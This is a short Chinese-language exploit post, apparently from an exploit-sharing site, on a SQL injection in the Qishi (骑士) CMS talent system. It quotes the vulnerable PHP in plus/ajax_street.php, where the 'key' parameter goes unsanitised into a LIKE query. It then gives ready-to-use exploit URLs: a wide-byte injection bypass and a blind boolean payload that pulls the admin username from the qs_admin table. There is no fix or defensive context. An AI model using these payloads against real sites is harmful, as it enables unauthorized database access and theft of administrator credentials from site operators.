骑士cms人才系统 通杀SQL注入

代码出现在plus/ajax_street.php文件中 [php] 43行开始 elseif($act == 'key') { $key=trim($_GET['key']); if (!empty($key)) { if (strcasecmp(QISHI_DBCHARSET,"utf8")!=0) $key=iconv("utf-8",QISHI_DBCHARSET,$key); $result = $db->query("select * from ".table('category')." where c_alias='QS_street' AND c_name LIKE '%{$key}%' "); while($row = $db->fetch_array($result)) { if ($listtype=="li") [/php] 利用如下 [php]http://0day5.com/upload/plus/ajax_street.php?act=key&key=s%e9%8c%a6' or 1=1%23 http://0day5.com/upload/plus/ajax_street.php?act=key&key=s%e9%8c%a6' or cast(ascii(substring((select admin_name from qs_admin),1,1))=97 as signed) %23[/php]

发表评论